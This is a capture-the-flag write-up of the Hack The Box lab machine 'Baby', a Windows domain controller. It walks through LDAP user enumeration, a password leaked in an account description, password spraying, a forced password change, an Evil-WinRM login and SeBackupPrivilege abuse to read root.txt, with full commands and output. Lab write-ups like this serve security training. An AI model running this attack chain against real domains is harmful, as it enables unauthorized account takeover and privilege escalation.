HTB | Baby
Machine - https://app.hackthebox.com/machines/Baby
IP - 10.129.60.223
NMAP
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49669,51495,51496,51505,61220 10.129.60.223 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-10-16 06:10 UTC
Nmap scan report for ip-10-129-60-223.ap-south-1.compute.internal (10.129.60.223)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-16 06:11:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after: 2026-02-17T12:14:43
|_ssl-date: 2025-10-16T06:12:30+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-16T06:11:50+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
51495/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51496/tcp open msrpc Microsoft Windows RPC
51505/tcp open msrpc Microsoft Windows RPC
61220/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-16T06:11:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 102.16 secondsSMB
null authentication is there but we cannot enum shares
netexec smb baby.vl -u "" -p "" --shares
SMB 10.129.60.223 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.60.223 445 BABYDC [+] baby.vl\\:
SMB 10.129.60.223 445 BABYDC [-] Error enumerating shares: STATUS_ACCESS_DENIEDLDAP
ldapsearch -H ldap://10.129.60.223 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=baby,DC=vl
namingcontexts: CN=Configuration,DC=baby,DC=vl
namingcontexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingcontexts: DC=DomainDnsZones,DC=baby,DC=vl
namingcontexts: DC=ForestDnsZones,DC=baby,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1we can get the user list via nxc
netexec ldap baby.vl -u "" -p "" --users
LDAP 10.129.60.223 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.60.223 389 BABYDC [+] baby.vl\\:
LDAP 10.129.60.223 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.129.60.223 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.60.223 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.60.223 389 BABYDC Jacqueline.Barnett 2021-11-21 15:11:03 0
LDAP 10.129.60.223 389 BABYDC Ashley.Webb 2021-11-21 15:11:03 0
LDAP 10.129.60.223 389 BABYDC Hugh.George 2021-11-21 15:11:03 0
LDAP 10.129.60.223 389 BABYDC Leonard.Dyer 2021-11-21 15:11:03 0
LDAP 10.129.60.223 389 BABYDC Connor.Wilkinson 2021-11-21 15:11:08 0
LDAP 10.129.60.223 389 BABYDC Joseph.Hughes 2021-11-21 15:11:08 0
LDAP 10.129.60.223 389 BABYDC Kerry.Wilson 2021-11-21 15:11:08 0
LDAP 10.129.60.223 389 BABYDC Teresa.Bell 2021-11-21 15:14:37 0 Set initial password to BabyStart123! netexec ldap baby.vl -u "" -p "" --query "(objectClass=*)" "" | grep "Response for object:"
LDAP 10.129.60.223 389 BABYDC [+] Response for object: DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.60.223 389 BABYDC [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vlLet’s combine both
Foothold/shell
Shell as Caroline.Robinson
From the description we got the credential Teresa.Bell
netexec smb baby.vl -u "Teresa.Bell" -p "BabyStart123!"
SMB 10.129.60.223 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
admin@ip-172-31-25-116:~/baby$ netexec winrm baby.vl -u "Teresa.Bell" -p "BabyStart123!"
WINRM 10.129.60.223 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.60.223 5985 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123!
admin@ip-172-31-25-116:~/baby$ netexec ldap baby.vl -u "Teresa.Bell" -p "BabyStart123!"
LDAP 10.129.60.223 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123! Looks like it is not working for Teresa, let’s do passwordspray
netexec smb baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
SMB 10.129.60.223 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\it:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE SMB passwordspray fails but for Caroline gives STATUS_PASSWORD_MUST_CHANGE, let’s try for LDAP
netexec ldap baby.vl -u username.txt -p 'BabyStart123!' --continue-on-success
LDAP 10.129.60.223 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Jacqueline.Barnett:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Ashley.Webb:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Hugh.George:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Leonard.Dyer:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Ian.Walker:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\it:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Connor.Wilkinson:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Joseph.Hughes:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Kerry.Wilson:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Teresa.Bell:BabyStart123!
LDAP 10.129.60.223 389 BABYDC [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGEsame error for Caroline STATUS_PASSWORD_MUST_CHANGE let’s change the password
netexec smb baby.vl -u 'Caroline.Robinson' -p 'BabyStart123!' -M change-password -o NEWPASS='P@ssw0rd@123'
SMB 10.129.60.223 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.60.223 445 BABYDC [-] baby.vl\\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.60.223 445 BABYDC [+] Successfully changed password for Caroline.Robinsonand we can authenticate
netexec ldap baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
LDAP 10.129.60.223 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.60.223 389 BABYDC [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)we can get the shares and we have READ, WRITE on C$
netexec smb baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123' --shares
SMB 10.129.60.223 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.60.223 445 BABYDC [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123
SMB 10.129.60.223 445 BABYDC [*] Enumerated shares
SMB 10.129.60.223 445 BABYDC Share Permissions Remark
SMB 10.129.60.223 445 BABYDC ----- ----------- ------
SMB 10.129.60.223 445 BABYDC ADMIN$ READ Remote Admin
SMB 10.129.60.223 445 BABYDC C$ READ,WRITE Default share
SMB 10.129.60.223 445 BABYDC IPC$ READ Remote IPC
SMB 10.129.60.223 445 BABYDC NETLOGON READ Logon server share
SMB 10.129.60.223 445 BABYDC SYSVOL READ Logon server sharelet’s winrm to the server
netexec winrm baby.vl -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
WINRM 10.129.60.223 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.60.223 5985 BABYDC [+] baby.vl\\Caroline.Robinson:P@ssw0rd@123 (Pwn3d!)and we are in
ruby /opt/evil-winrm/evil-winrm.rb -i 10.129.60.223 -u 'Caroline.Robinson' -p 'P@ssw0rd@123'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> found user.txt
Directory: C:\\Users\\Caroline.Robinson\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/16/2025 6:06 AM 34 user.txtPriveleage Esclation
Shell as ?
SeBackupPrivilege
We are in the backup operator group and have SeBackupPrivilege
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\\High Mandatory Level Label S-1-16-12288
*Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> *Evil-WinRM* PS C:\\Users\\Caroline.Robinson\\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledThis repo has a nice set of PowerShell tools for abusing the SeBackupPrivilege
Let’s download and import them into my current session:
*Evil-WinRM* PS C:\\temp> Import-Module .\\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\\temp> Import-Module .\\SeBackupPrivilegeUtils.dllNow I can copy root.txt
Copy-FileSeBackupPrivilege C:\\Users\\Administrator\\Desktop\\root.txt root.txt
*Evil-WinRM* PS C:\\temp> dir
Directory: C:\\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/16/2025 9:18 AM 34 root.txt
-a---- 10/16/2025 8:50 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 10/16/2025 8:50 AM 16384 SeBackupPrivilegeUtils.dllLast updated